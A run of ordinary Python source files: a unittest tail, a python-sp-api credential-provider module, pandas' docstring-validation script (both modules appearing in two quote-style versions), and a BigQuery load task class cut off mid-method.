self.assertRaises(Exception): mf[(),] # type: ignore with self.assertRaises(Exception): mf[[],] # type: ignore with self.assertRaises(Exception): mf[set(),] # type: ignore self.assertIsNone(mf[frozenset(),]) with self.assertRaises(Exception): mf[frozenset([0]),] with self.assertRaises(Exception): mf[frozenset([0,1]),] self.assertEqual( mf.seed([None]), (frozenset(),) ) mf[frozenset(),] = True with self.assertRaises(Exception): mf[frozenset(),] = False with self.assertRaises(Exception): mf[frozenset(),] = True self.assertEqual( mf[frozenset(),], True ) self.assertIsNone(mf.seed([None])) elems.append('hello') self.assertEqual( mf.seed([None]), (frozenset([0]),) ) self.assertIsNone(mf.seed([{0: False}])) self.assertIsNone(mf[frozenset([0]),]) with self.assertRaises(Exception): mf[frozenset([0,1]),] mf[frozenset([0]),] = True with self.assertRaises(Exception): mf[frozenset([0]),] = False with self.assertRaises(Exception): mf[frozenset([0]),] = True self.assertEqual( mf[frozenset([0]),], True ) self.assertIsNone(mf.seed([None])) elems.append('world') self.assertIsNotNone(mf.seed([None])) self.assertIsNone(mf.seed([{1: False}])) mf[frozenset([1]),] = True self.assertEqual( mf.seed([None]), (frozenset([0,1]),) ) mf[frozenset([0,1]),] = False self.assertEqual( mf[frozenset([0,1]),], False ) self.assertIsNone(mf.seed([None])) elems.append('!') self.assertEqual( mf[frozenset([0,1,2]),], False ) self.assertIsNone(mf[frozenset([0,2]),]) self.assertIsNone(mf[frozenset([2]),]) self.assertEqual(mf.to_elems((frozenset(),)), ([],)) self.assertEqual(mf.to_elems((frozenset([0]),)), (['hello'],)) self.assertEqual(mf.to_elems((frozenset([0,1]),)), (['hello', 'world'],)) self.assertEqual(mf.to_elems((frozenset([1,0]),)), (['hello', 'world'],)) self.assertEqual(mf.to_elems((frozenset([0,2]),)), (['hello', '!'],)) with self.assertRaises(Exception): mf.to_elems((frozenset([3]),)) # TODO: test multiple domains together, more tests with infinity
import json import os import confuse import boto3 from botocore.exceptions import ClientError from cachetools import Cache required_credentials = [ 'aws_access_key', 'aws_secret_key', 'lwa_app_id', 'lwa_client_secret' ] class MissingCredentials(Exception): """ Credentials are missing, see the error output to find possible causes """ pass class BaseCredentialProvider: errors = [] credentials = None def __init__(self, account: str = 'default', *args, **kwargs): self.account = account def __call__(self, *args, **kwargs): self.load_credentials() return self.check_credentials() def load_credentials(self): raise NotImplementedError() def check_credentials(self): try: self.errors = [c for c in required_credentials if c not in self.credentials.keys() or not self.credentials[c]] except (AttributeError, TypeError): raise MissingCredentials(f'Credentials are missing: {', '.join(required_credentials)}') if not len(self.errors): return self.credentials raise MissingCredentials(f'Credentials are missing: {', '.join(self.errors)}') class FromCodeCredentialProvider(BaseCredentialProvider): def load_credentials(self): return None def __init__(self, credentials: dict, *args, **kwargs): super(FromCodeCredentialProvider, self).__init__('default', credentials) self.credentials = credentials class FromConfigFileCredentialProvider(BaseCredentialProvider): def load_credentials(self): try: config = confuse.Configuration('python-sp-api') config_filename = os.path.join(config.config_dir(), 'credentials.yml') config.set_file(config_filename) account_data = config[self.account].get() self.credentials = account_data except (confuse.exceptions.NotFoundError, confuse.exceptions.ConfigReadError): return class FromSecretsCredentialProvider(BaseCredentialProvider): def load_credentials(self): if not os.environ.get('SP_API_AWS_SECRET_ID', None): return try: client = boto3.client('secretsmanager') response = client.get_secret_value( SecretId=os.environ.get('SP_API_AWS_SECRET_ID') ) secret = json.loads(response.get('SecretString')) account_data = dict( refresh_token=secret.get('SP_API_REFRESH_TOKEN'), lwa_app_id=secret.get('LWA_APP_ID'), lwa_client_secret=secret.get('LWA_CLIENT_SECRET'), aws_secret_key=secret.get('SP_API_SECRET_KEY'), aws_access_key=secret.get('SP_API_ACCESS_KEY'), role_arn=secret.get('SP_API_ROLE_ARN') ) except ClientError: return else: self.credentials = account_data class FromEnvironmentVariablesCredentialProvider(BaseCredentialProvider): def load_credentials(self): account_data = dict( refresh_token=self._get_env('SP_API_REFRESH_TOKEN'), lwa_app_id=self._get_env('LWA_APP_ID'), lwa_client_secret=self._get_env('LWA_CLIENT_SECRET'), aws_secret_key=self._get_env('SP_API_SECRET_KEY'), aws_access_key=self._get_env('SP_API_ACCESS_KEY'), role_arn=self._get_env('SP_API_ROLE_ARN') ) self.credentials = account_data def _get_env(self, key): return os.environ.get(f'{key}_{self.account}', os.environ.get(key)) class CredentialProvider: credentials = None cache = Cache(maxsize=10) CREDENTIAL_PROVIDERS = [ FromCodeCredentialProvider, FromEnvironmentVariablesCredentialProvider, FromSecretsCredentialProvider, FromConfigFileCredentialProvider ] def __init__(self, account='default', credentials=None): self.account = account for cp in self.CREDENTIAL_PROVIDERS: try: self.credentials = cp(account=account, credentials=credentials)() break except MissingCredentials: continue if self.credentials: self.credentials = self.Config(**self.credentials) else: raise MissingCredentials(f'Credentials are missing: {', '.join(required_credentials)}') class Config: def __init__(self, **kwargs): self.refresh_token = kwargs.get('refresh_token') self.lwa_app_id = kwargs.get('lwa_app_id') self.lwa_client_secret = kwargs.get('lwa_client_secret') self.aws_access_key = kwargs.get('aws_access_key') self.aws_secret_key = kwargs.get('aws_secret_key') self.role_arn = kwargs.get('role_arn')
import json import os import confuse import boto3 from botocore.exceptions import ClientError from cachetools import Cache required_credentials = [ 'aws_access_key', 'aws_secret_key', 'lwa_app_id', 'lwa_client_secret' ] class MissingCredentials(Exception): """ Credentials are missing, see the error output to find possible causes """ pass class BaseCredentialProvider: errors = [] credentials = None def __init__(self, account: str = 'default', *args, **kwargs): self.account = account def __call__(self, *args, **kwargs): self.load_credentials() return self.check_credentials() def load_credentials(self): raise NotImplementedError() def check_credentials(self): try: self.errors = [c for c in required_credentials if c not in self.credentials.keys() or not self.credentials[c]] except (AttributeError, TypeError): raise MissingCredentials(f'Credentials are missing: {", ".join(required_credentials)}') if not len(self.errors): return self.credentials raise MissingCredentials(f'Credentials are missing: {", ".join(self.errors)}') class FromCodeCredentialProvider(BaseCredentialProvider): def load_credentials(self): return None def __init__(self, credentials: dict, *args, **kwargs): super(FromCodeCredentialProvider, self).__init__('default', credentials) self.credentials = credentials class FromConfigFileCredentialProvider(BaseCredentialProvider): def load_credentials(self): try: config = confuse.Configuration('python-sp-api') config_filename = os.path.join(config.config_dir(), 'credentials.yml') config.set_file(config_filename) account_data = config[self.account].get() self.credentials = account_data except (confuse.exceptions.NotFoundError, confuse.exceptions.ConfigReadError): return class FromSecretsCredentialProvider(BaseCredentialProvider): def load_credentials(self): if not os.environ.get('SP_API_AWS_SECRET_ID', None): return try: client = boto3.client('secretsmanager') response = client.get_secret_value( SecretId=os.environ.get('SP_API_AWS_SECRET_ID') ) secret = json.loads(response.get('SecretString')) account_data = dict( refresh_token=secret.get('SP_API_REFRESH_TOKEN'), lwa_app_id=secret.get('LWA_APP_ID'), lwa_client_secret=secret.get('LWA_CLIENT_SECRET'), aws_secret_key=secret.get('SP_API_SECRET_KEY'), aws_access_key=secret.get('SP_API_ACCESS_KEY'), role_arn=secret.get('SP_API_ROLE_ARN') ) except ClientError: return else: self.credentials = account_data class FromEnvironmentVariablesCredentialProvider(BaseCredentialProvider): def load_credentials(self): account_data = dict( refresh_token=self._get_env('SP_API_REFRESH_TOKEN'), lwa_app_id=self._get_env('LWA_APP_ID'), lwa_client_secret=self._get_env('LWA_CLIENT_SECRET'), aws_secret_key=self._get_env('SP_API_SECRET_KEY'), aws_access_key=self._get_env('SP_API_ACCESS_KEY'), role_arn=self._get_env('SP_API_ROLE_ARN') ) self.credentials = account_data def _get_env(self, key): return os.environ.get(f'{key}_{self.account}', os.environ.get(key)) class CredentialProvider: credentials = None cache = Cache(maxsize=10) CREDENTIAL_PROVIDERS = [ FromCodeCredentialProvider, FromEnvironmentVariablesCredentialProvider, FromSecretsCredentialProvider, FromConfigFileCredentialProvider ] def __init__(self, account='default', credentials=None): self.account = account for cp in self.CREDENTIAL_PROVIDERS: try: self.credentials = cp(account=account, credentials=credentials)() break except MissingCredentials: continue if self.credentials: self.credentials = self.Config(**self.credentials) else: raise MissingCredentials(f'Credentials are missing: {", ".join(required_credentials)}') class Config: def __init__(self, **kwargs): self.refresh_token = kwargs.get('refresh_token') self.lwa_app_id = kwargs.get('lwa_app_id') self.lwa_client_secret = kwargs.get('lwa_client_secret') self.aws_access_key = kwargs.get('aws_access_key') self.aws_secret_key = kwargs.get('aws_secret_key') self.role_arn = kwargs.get('role_arn')
#!/usr/bin/env python3 """ Analyze docstrings to detect errors. If no argument is provided, it does a quick check of docstrings and returns a csv with all API functions and results of basic checks. If a function or method is provided in the form "pandas.function", "pandas.module.class.method", etc. a list of all errors in the docstring for the specified function or method. Usage:: $ ./validate_docstrings.py $ ./validate_docstrings.py pandas.DataFrame.head """ import argparse import doctest import glob import importlib import json import os import sys import tempfile from typing import List, Optional import flake8.main.application try: from io import StringIO except ImportError: from cStringIO import StringIO # Template backend makes matplotlib to not plot anything. This is useful # to avoid that plot windows are open from the doctests while running the # script. Setting here before matplotlib is loaded. # We don't warn for the number of open plots, as none is actually being opened os.environ["MPLBACKEND"] = "Template" import matplotlib # noqa: E402 isort:skip matplotlib.rc("figure", max_open_warning=10000) import numpy # noqa: E402 isort:skip BASE_PATH = os.path.dirname(os.path.dirname(os.path.abspath(__file__))) sys.path.insert(0, os.path.join(BASE_PATH)) import pandas # noqa: E402 isort:skip sys.path.insert(1, os.path.join(BASE_PATH, "doc", "sphinxext")) from numpydoc.validate import validate, Docstring # noqa: E402 isort:skip PRIVATE_CLASSES = ["NDFrame", "IndexOpsMixin"] ERROR_MSGS = { "GL04": "Private classes ({mentioned_private_classes}) should not be " "mentioned in public docstrings", "SA05": "{reference_name} in `See Also` section does not need `pandas` " "prefix, use {right_reference} instead.", "EX02": "Examples do not pass tests:\n{doctest_log}", "EX03": "flake8 error: {error_code} {error_message}{times_happening}", "EX04": "Do not import {imported_library}, as it is imported " "automatically for the examples (numpy as np, pandas as pd)", } def pandas_error(code, **kwargs): """ Copy of the numpydoc error function, since ERROR_MSGS can't be updated with our custom errors yet. """ return (code, ERROR_MSGS[code].format(**kwargs)) def get_api_items(api_doc_fd): """ Yield information about all public API items. Parse api.rst file from the documentation, and extract all the functions, methods, classes, attributes... This should include all pandas public API. Parameters ---------- api_doc_fd : file descriptor A file descriptor of the API documentation page, containing the table of contents with all the public API. Yields ------ name : str The name of the object (e.g. 'pandas.Series.str.upper). func : function The object itself. In most cases this will be a function or method, but it can also be classes, properties, cython objects... section : str The name of the section in the API page where the object item is located. subsection : str The name of the subsection in the API page where the object item is located. """ current_module = "pandas" previous_line = current_section = current_subsection = "" position = None for line in api_doc_fd: line = line.strip() if len(line) == len(previous_line): if set(line) == set("-"): current_section = previous_line continue if set(line) == set("~"): current_subsection = previous_line continue if line.startswith(".. currentmodule::"): current_module = line.replace(".. currentmodule::", "").strip() continue if line == ".. autosummary::": position = "autosummary" continue if position == "autosummary": if line == "": position = "items" continue if position == "items": if line == "": position = None continue item = line.strip() func = importlib.import_module(current_module) for part in item.split("."): func = getattr(func, part) yield ( ".".join([current_module, item]), func, current_section, current_subsection, ) previous_line = line class PandasDocstring(Docstring): @property def mentioned_private_classes(self): return [klass for klass in PRIVATE_CLASSES if klass in self.raw_doc] @property def examples_errors(self): flags = doctest.NORMALIZE_WHITESPACE | doctest.IGNORE_EXCEPTION_DETAIL finder = doctest.DocTestFinder() runner = doctest.DocTestRunner(optionflags=flags) context = {"np": numpy, "pd": pandas} error_msgs = "" for test in finder.find(self.raw_doc, self.name, globs=context): f = StringIO() runner.run(test, out=f.write) error_msgs += f.getvalue() return error_msgs @property def examples_source_code(self): lines = doctest.DocTestParser().get_examples(self.raw_doc) return [line.source for line in lines] def validate_pep8(self): if not self.examples: return # F401 is needed to not generate flake8 errors in examples # that do not user numpy or pandas content = "".join( ( "import numpy as np # noqa: F401\n", "import pandas as pd # noqa: F401\n", *self.examples_source_code, ) ) application = flake8.main.application.Application() application.initialize(["--quiet"]) with tempfile.NamedTemporaryFile(mode="w", encoding="utf-8") as file: file.write(content) file.flush() application.run_checks([file.name]) # We need this to avoid flake8 printing the names of the files to # the standard output application.formatter.write = lambda line, source: None application.report() yield from application.guide.stats.statistics_for("") def pandas_validate(func_name: str): """ Call the numpydoc validation, and add the errors specific to pandas. Parameters ---------- func_name : str Name of the object of the docstring to validate. Returns ------- dict Information about the docstring and the errors found. """ doc = PandasDocstring(func_name) result = validate(func_name) mentioned_errs = doc.mentioned_private_classes if mentioned_errs: result["errors"].append( pandas_error("GL04", mentioned_private_classes=", ".join(mentioned_errs)) ) if doc.see_also: for rel_name, rel_desc in doc.see_also.items(): if rel_name.startswith("pandas."): result["errors"].append( pandas_error( "SA05", reference_name=rel_name, right_reference=rel_name[len("pandas.") :], ) ) result["examples_errs"] = "" if doc.examples: result["examples_errs"] = doc.examples_errors if result["examples_errs"]: result["errors"].append( pandas_error("EX02", doctest_log=result["examples_errs"]) ) for err in doc.validate_pep8(): result["errors"].append( pandas_error( "EX03", error_code=err.error_code, error_message=err.message, times_happening=f" ({err.count} times)" if err.count > 1 else "", ) ) examples_source_code = "".join(doc.examples_source_code) for wrong_import in ("numpy", "pandas"): if f"import {wrong_import}" in examples_source_code: result["errors"].append( pandas_error("EX04", imported_library=wrong_import) ) return result def validate_all(prefix, ignore_deprecated=False): """ Execute the validation of all docstrings, and return a dict with the results. Parameters ---------- prefix : str or None If provided, only the docstrings that start with this pattern will be validated. If None, all docstrings will be validated. ignore_deprecated: bool, default False If True, deprecated objects are ignored when validating docstrings. Returns ------- dict A dictionary with an item for every function/method... containing all the validation information. """ result = {} seen = {} api_doc_fnames = os.path.join(BASE_PATH, "doc", "source", "reference", "*.rst") api_items = [] for api_doc_fname in glob.glob(api_doc_fnames): with open(api_doc_fname) as f: api_items += list(get_api_items(f)) for func_name, func_obj, section, subsection in api_items: if prefix and not func_name.startswith(prefix): continue doc_info = pandas_validate(func_name) if ignore_deprecated and doc_info["deprecated"]: continue result[func_name] = doc_info shared_code_key = doc_info["file"], doc_info["file_line"] shared_code = seen.get(shared_code_key, "") result[func_name].update( { "in_api": True, "section": section, "subsection": subsection, "shared_code_with": shared_code, } ) seen[shared_code_key] = func_name return result def print_validate_all_results( prefix: str, errors: Optional[List[str]], output_format: str, ignore_deprecated: bool, ): if output_format not in ("default", "json", "actions"): raise ValueError(f'Unknown output_format "{output_format}"') result = validate_all(prefix, ignore_deprecated) if output_format == "json": sys.stdout.write(json.dumps(result)) return 0 prefix = "##[error]" if output_format == "actions" else "" exit_status = 0 for name, res in result.items(): for err_code, err_desc in res["errors"]: if errors and err_code not in errors: continue sys.stdout.write( f'{prefix}{res['file']}:{res['file_line']}:' f"{err_code}:{name}:{err_desc}\n" ) exit_status += 1 return exit_status def print_validate_one_results(func_name: str): def header(title, width=80, char="#"): full_line = char * width side_len = (width - len(title) - 2) // 2 adj = "" if len(title) % 2 == 0 else " " title_line = f"{char * side_len} {title}{adj} {char * side_len}" return f"\n{full_line}\n{title_line}\n{full_line}\n\n" result = pandas_validate(func_name) sys.stderr.write(header(f"Docstring ({func_name})")) sys.stderr.write(f"{result["docstring"]}\n") sys.stderr.write(header("Validation")) if result["errors"]: sys.stderr.write(f'{len(result['errors'])} Errors found:\n') for err_code, err_desc in result["errors"]: if err_code == "EX02": # Failing examples are printed at the end sys.stderr.write("\tExamples do not pass tests\n") continue sys.stderr.write(f"\t{err_desc}\n") else: sys.stderr.write(f'Docstring for "{func_name}" correct. :)\n') if result["examples_errs"]: sys.stderr.write(header("Doctests")) sys.stderr.write(result["examples_errs"]) def main(func_name, prefix, errors, output_format, ignore_deprecated): """ Main entry point. Call the validation for one or for all docstrings. """ if func_name is None: return print_validate_all_results( prefix, errors, output_format, ignore_deprecated ) else: print_validate_one_results(func_name) return 0 if __name__ == "__main__": format_opts = "default", "json", "actions" func_help = ( "function or method to validate (e.g. pandas.DataFrame.head) " "if not provided, all docstrings are validated and returned " "as JSON" ) argparser = argparse.ArgumentParser(description="validate pandas docstrings") argparser.add_argument("function", nargs="?", default=None, help=func_help) argparser.add_argument( "--format", default="default", choices=format_opts, help="format of the output when validating " "multiple docstrings (ignored when validating one). " "It can be {str(format_opts)[1:-1]}", ) argparser.add_argument( "--prefix", default=None, help="pattern for the " "docstring names, in order to decide which ones " 'will be validated. A prefix "pandas.Series.str."' "will make the script validate all the docstrings " "of methods starting by this pattern. It is " "ignored if parameter function is provided", ) argparser.add_argument( "--errors", default=None, help="comma separated " "list of error codes to validate. By default it " "validates all errors (ignored when validating " "a single docstring)", ) argparser.add_argument( "--ignore_deprecated", default=False, action="store_true", help="if this flag is set, " "deprecated objects are ignored when validating " "all docstrings", ) args = argparser.parse_args() sys.exit( main( args.function, args.prefix, args.errors.split(",") if args.errors else None, args.format, args.ignore_deprecated, ) )
#!/usr/bin/env python3 """ Analyze docstrings to detect errors. If no argument is provided, it does a quick check of docstrings and returns a csv with all API functions and results of basic checks. If a function or method is provided in the form "pandas.function", "pandas.module.class.method", etc. a list of all errors in the docstring for the specified function or method. Usage:: $ ./validate_docstrings.py $ ./validate_docstrings.py pandas.DataFrame.head """ import argparse import doctest import glob import importlib import json import os import sys import tempfile from typing import List, Optional import flake8.main.application try: from io import StringIO except ImportError: from cStringIO import StringIO # Template backend makes matplotlib to not plot anything. This is useful # to avoid that plot windows are open from the doctests while running the # script. Setting here before matplotlib is loaded. # We don't warn for the number of open plots, as none is actually being opened os.environ["MPLBACKEND"] = "Template" import matplotlib # noqa: E402 isort:skip matplotlib.rc("figure", max_open_warning=10000) import numpy # noqa: E402 isort:skip BASE_PATH = os.path.dirname(os.path.dirname(os.path.abspath(__file__))) sys.path.insert(0, os.path.join(BASE_PATH)) import pandas # noqa: E402 isort:skip sys.path.insert(1, os.path.join(BASE_PATH, "doc", "sphinxext")) from numpydoc.validate import validate, Docstring # noqa: E402 isort:skip PRIVATE_CLASSES = ["NDFrame", "IndexOpsMixin"] ERROR_MSGS = { "GL04": "Private classes ({mentioned_private_classes}) should not be " "mentioned in public docstrings", "SA05": "{reference_name} in `See Also` section does not need `pandas` " "prefix, use {right_reference} instead.", "EX02": "Examples do not pass tests:\n{doctest_log}", "EX03": "flake8 error: {error_code} {error_message}{times_happening}", "EX04": "Do not import {imported_library}, as it is imported " "automatically for the examples (numpy as np, pandas as pd)", } def pandas_error(code, **kwargs): """ Copy of the numpydoc error function, since ERROR_MSGS can't be updated with our custom errors yet. """ return (code, ERROR_MSGS[code].format(**kwargs)) def get_api_items(api_doc_fd): """ Yield information about all public API items. Parse api.rst file from the documentation, and extract all the functions, methods, classes, attributes... This should include all pandas public API. Parameters ---------- api_doc_fd : file descriptor A file descriptor of the API documentation page, containing the table of contents with all the public API. Yields ------ name : str The name of the object (e.g. 'pandas.Series.str.upper). func : function The object itself. In most cases this will be a function or method, but it can also be classes, properties, cython objects... section : str The name of the section in the API page where the object item is located. subsection : str The name of the subsection in the API page where the object item is located. """ current_module = "pandas" previous_line = current_section = current_subsection = "" position = None for line in api_doc_fd: line = line.strip() if len(line) == len(previous_line): if set(line) == set("-"): current_section = previous_line continue if set(line) == set("~"): current_subsection = previous_line continue if line.startswith(".. currentmodule::"): current_module = line.replace(".. currentmodule::", "").strip() continue if line == ".. autosummary::": position = "autosummary" continue if position == "autosummary": if line == "": position = "items" continue if position == "items": if line == "": position = None continue item = line.strip() func = importlib.import_module(current_module) for part in item.split("."): func = getattr(func, part) yield ( ".".join([current_module, item]), func, current_section, current_subsection, ) previous_line = line class PandasDocstring(Docstring): @property def mentioned_private_classes(self): return [klass for klass in PRIVATE_CLASSES if klass in self.raw_doc] @property def examples_errors(self): flags = doctest.NORMALIZE_WHITESPACE | doctest.IGNORE_EXCEPTION_DETAIL finder = doctest.DocTestFinder() runner = doctest.DocTestRunner(optionflags=flags) context = {"np": numpy, "pd": pandas} error_msgs = "" for test in finder.find(self.raw_doc, self.name, globs=context): f = StringIO() runner.run(test, out=f.write) error_msgs += f.getvalue() return error_msgs @property def examples_source_code(self): lines = doctest.DocTestParser().get_examples(self.raw_doc) return [line.source for line in lines] def validate_pep8(self): if not self.examples: return # F401 is needed to not generate flake8 errors in examples # that do not user numpy or pandas content = "".join( ( "import numpy as np # noqa: F401\n", "import pandas as pd # noqa: F401\n", *self.examples_source_code, ) ) application = flake8.main.application.Application() application.initialize(["--quiet"]) with tempfile.NamedTemporaryFile(mode="w", encoding="utf-8") as file: file.write(content) file.flush() application.run_checks([file.name]) # We need this to avoid flake8 printing the names of the files to # the standard output application.formatter.write = lambda line, source: None application.report() yield from application.guide.stats.statistics_for("") def pandas_validate(func_name: str): """ Call the numpydoc validation, and add the errors specific to pandas. Parameters ---------- func_name : str Name of the object of the docstring to validate. Returns ------- dict Information about the docstring and the errors found. """ doc = PandasDocstring(func_name) result = validate(func_name) mentioned_errs = doc.mentioned_private_classes if mentioned_errs: result["errors"].append( pandas_error("GL04", mentioned_private_classes=", ".join(mentioned_errs)) ) if doc.see_also: for rel_name, rel_desc in doc.see_also.items(): if rel_name.startswith("pandas."): result["errors"].append( pandas_error( "SA05", reference_name=rel_name, right_reference=rel_name[len("pandas.") :], ) ) result["examples_errs"] = "" if doc.examples: result["examples_errs"] = doc.examples_errors if result["examples_errs"]: result["errors"].append( pandas_error("EX02", doctest_log=result["examples_errs"]) ) for err in doc.validate_pep8(): result["errors"].append( pandas_error( "EX03", error_code=err.error_code, error_message=err.message, times_happening=f" ({err.count} times)" if err.count > 1 else "", ) ) examples_source_code = "".join(doc.examples_source_code) for wrong_import in ("numpy", "pandas"): if f"import {wrong_import}" in examples_source_code: result["errors"].append( pandas_error("EX04", imported_library=wrong_import) ) return result def validate_all(prefix, ignore_deprecated=False): """ Execute the validation of all docstrings, and return a dict with the results. Parameters ---------- prefix : str or None If provided, only the docstrings that start with this pattern will be validated. If None, all docstrings will be validated. ignore_deprecated: bool, default False If True, deprecated objects are ignored when validating docstrings. Returns ------- dict A dictionary with an item for every function/method... containing all the validation information. """ result = {} seen = {} api_doc_fnames = os.path.join(BASE_PATH, "doc", "source", "reference", "*.rst") api_items = [] for api_doc_fname in glob.glob(api_doc_fnames): with open(api_doc_fname) as f: api_items += list(get_api_items(f)) for func_name, func_obj, section, subsection in api_items: if prefix and not func_name.startswith(prefix): continue doc_info = pandas_validate(func_name) if ignore_deprecated and doc_info["deprecated"]: continue result[func_name] = doc_info shared_code_key = doc_info["file"], doc_info["file_line"] shared_code = seen.get(shared_code_key, "") result[func_name].update( { "in_api": True, "section": section, "subsection": subsection, "shared_code_with": shared_code, } ) seen[shared_code_key] = func_name return result def print_validate_all_results( prefix: str, errors: Optional[List[str]], output_format: str, ignore_deprecated: bool, ): if output_format not in ("default", "json", "actions"): raise ValueError(f'Unknown output_format "{output_format}"') result = validate_all(prefix, ignore_deprecated) if output_format == "json": sys.stdout.write(json.dumps(result)) return 0 prefix = "##[error]" if output_format == "actions" else "" exit_status = 0 for name, res in result.items(): for err_code, err_desc in res["errors"]: if errors and err_code not in errors: continue sys.stdout.write( f'{prefix}{res["file"]}:{res["file_line"]}:' f"{err_code}:{name}:{err_desc}\n" ) exit_status += 1 return exit_status def print_validate_one_results(func_name: str): def header(title, width=80, char="#"): full_line = char * width side_len = (width - len(title) - 2) // 2 adj = "" if len(title) % 2 == 0 else " " title_line = f"{char * side_len} {title}{adj} {char * side_len}" return f"\n{full_line}\n{title_line}\n{full_line}\n\n" result = pandas_validate(func_name) sys.stderr.write(header(f"Docstring ({func_name})")) sys.stderr.write(f"{result['docstring']}\n") sys.stderr.write(header("Validation")) if result["errors"]: sys.stderr.write(f'{len(result["errors"])} Errors found:\n') for err_code, err_desc in result["errors"]: if err_code == "EX02": # Failing examples are printed at the end sys.stderr.write("\tExamples do not pass tests\n") continue sys.stderr.write(f"\t{err_desc}\n") else: sys.stderr.write(f'Docstring for "{func_name}" correct. :)\n') if result["examples_errs"]: sys.stderr.write(header("Doctests")) sys.stderr.write(result["examples_errs"]) def main(func_name, prefix, errors, output_format, ignore_deprecated): """ Main entry point. Call the validation for one or for all docstrings. """ if func_name is None: return print_validate_all_results( prefix, errors, output_format, ignore_deprecated ) else: print_validate_one_results(func_name) return 0 if __name__ == "__main__": format_opts = "default", "json", "actions" func_help = ( "function or method to validate (e.g. pandas.DataFrame.head) " "if not provided, all docstrings are validated and returned " "as JSON" ) argparser = argparse.ArgumentParser(description="validate pandas docstrings") argparser.add_argument("function", nargs="?", default=None, help=func_help) argparser.add_argument( "--format", default="default", choices=format_opts, help="format of the output when validating " "multiple docstrings (ignored when validating one). " "It can be {str(format_opts)[1:-1]}", ) argparser.add_argument( "--prefix", default=None, help="pattern for the " "docstring names, in order to decide which ones " 'will be validated. A prefix "pandas.Series.str."' "will make the script validate all the docstrings " "of methods starting by this pattern. It is " "ignored if parameter function is provided", ) argparser.add_argument( "--errors", default=None, help="comma separated " "list of error codes to validate. By default it " "validates all errors (ignored when validating " "a single docstring)", ) argparser.add_argument( "--ignore_deprecated", default=False, action="store_true", help="if this flag is set, " "deprecated objects are ignored when validating " "all docstrings", ) args = argparser.parse_args() sys.exit( main( args.function, args.prefix, args.errors.split(",") if args.errors else None, args.format, args.ignore_deprecated, ) )
# -*- coding: utf-8 -*- """BigQuery Load Task.""" from pathlib import Path from typing import Dict, List from google.cloud import bigquery from luft.common.column import Column from luft.common.config import ( BQ_DATA_TYPES, BQ_HIST_DEFAULT_TEMPLATE, BQ_STAGE_DEFAULT_TEMPLATE, BQ_STAGE_SCHEMA_FORM, GCS_BUCKET, PATH_PREFIX) from luft.common.logger import setup_logger from luft.common.utils import NoneStr, get_path_prefix from luft.tasks.bq_exec_task import BQExecTask import pkg_resources # Setup logger logger = setup_logger('common', 'INFO') class BQLoadTask(BQExecTask): """BQ Load Task.""" def __init__(self, name: str, task_type: str, source_system: str, source_subsystem: str, columns: List[Column], project_id: NoneStr = None, location: NoneStr = None, dataset_id: NoneStr = None, skip_leading_rows: bool = True, allow_quoted_newlines: bool = True, disable_check: bool = False, field_delimiter: str = '\t', path_prefix: NoneStr = None, yaml_file: NoneStr = None, env: NoneStr = None, thread_name: NoneStr = None, color: NoneStr = None): """Initialize BigQuery Load Task. Attributes: name (str): name of task. task_type (str): type of task. E.g. embulk-jdbc-load, mongo-load, etc. source_system (str): name of source system. Usually name of database. Used for better organization especially on blob storage. E.g. jobs, prace, pzr. source_subsystem (str): name of source subsystem. Usually name of schema. Used for better organization especially on blob storage. E.g. public, b2b. env (str): environment - PROD, DEV. thread_name(str): name of thread for Airflow parallelization. color (str): hex code of color. Airflow operator will have this color. """ self.columns = columns self.path_prefix = path_prefix or PATH_PREFIX self.skip_leading_rows = skip_leading_rows self.allow_quoted_newlines = allow_quoted_newlines self.field_delimiter = field_delimiter self.disable_check = disable_check self.dataset_id = dataset_id or source_system self.stage_dataset_id = BQ_STAGE_SCHEMA_FORM.format( env=self.get_env, source_system=self.get_source_system, source_subsystem=self.get_source_subsystem, dataset_id=self.dataset_id ) super().__init__(name=name, task_type=task_type, source_system=source_system, source_subsystem=source_subsystem, yaml_file=yaml_file, project_id=project_id, location=location, env=env, thread_name=thread_name, color=color) def __call__(self, ts: str, env: NoneStr = None): """Make class callable. Attributes: ts (str): time of valid. """ stage_template = Path(pkg_resources.resource_filename( 'luft', BQ_STAGE_DEFAULT_TEMPLATE)) hist_template = Path(pkg_resources.resource_filename( 'luft', BQ_HIST_DEFAULT_TEMPLATE)) env_vars = self.get_env_vars(ts, env) self._create_dataset(self.stage_dataset_id) self._run_bq_command(stage_template.parent, [stage_template.name], env_vars) self.load_csv() self._create_dataset(self.dataset_id) self._run_bq_command(hist_template.parent, [hist_template.name], env_vars) def get_env_vars(self, ts: str, env: NoneStr = None) -> Dict[str, str]: """Get Docker enviromental variables.""" super_env_dict = super().get_env_vars(ts=ts, env=env) env_dict = { 'TABLE_NAME': self.name, 'STAGE_SCHEMA': f'stage_{self.source_system.lower()}', 'HISTORY_SCHEMA': self.source_system.lower(), 'PK': self._get_col_names('pk'), 'PK_DEFINITION_LIST': self._get_col_defs('pk'), 'COLUMNS': self._get_col_names('nonpk'), 'COLUMN_DEFINITION_LIST': self._get_col_defs('nonpk'), 'HASH_COLUMNS': self._get_hash_diff(), 'PK_JOIN': self._get_pk_join() } clean_dict = self.clean_dictionary(env_dict) clean_dict.update(super_env_dict) return clean_dict def _get_col_names(self, col_type: str) -> str: """Get list of column names. Parameters: col_type (str): what type of columns should be returned. Default `all`. Values: - all - primary and nonprimary keys are returned - pk - only primary keys are returned - nonpk - only nonprimary keys are returned. """ cols = [col.get_name(col_type, include_tech=False) for col in self.columns if col.get_name(col_type, include_tech=False)] return ',\n'.join(cols) def _get_col_defs(self, col_type: str) -> str: """Get list of column definition. Parameters: col_type (str): what type of columns should be returned. Default `all`. Values: - all - primary and nonprimary keys are returned - pk - only primary keys are returned - nonpk - only nonprimary keys are returned. """ cols = [col.get_def(col_type, include_tech=False, supported_types=BQ_DATA_TYPES) for col in self.columns if col.get_def(col_type, include_tech=False, supported_types=BQ_DATA_TYPES)] return ',\n '.join(cols) def _get_pk_join(self) -> str: """Get PK join. Parameters: col_type (str): what type of columns should be returned. Default `all`. Values: - all - primary and nonprimary keys are returned - pk - only primary keys are returned - nonpk - only nonprimary keys are returned. """ pk_join = [col.get_join('pk', include_tech=False) for col in self.columns if col.get_join('pk', include_tech=False)] return '\nAND '.join(pk_join) def _get_hash_diff(self) -> str: """Get hash diff columns. Parameters: col_type (str): what type of columns should be returned. Default `all`. Values: - all - primary and nonprimary keys are returned - pk - only primary keys are returned - nonpk - only nonprimary keys are returned. """ cols = [f'IFNULL(CAST({col.get_name('all', include_tech=False)} AS STRING), \'\')' for col in self.columns if col.get_name('all', include_tech=False)] return ', '.join(cols) def load_csv(self): """Load 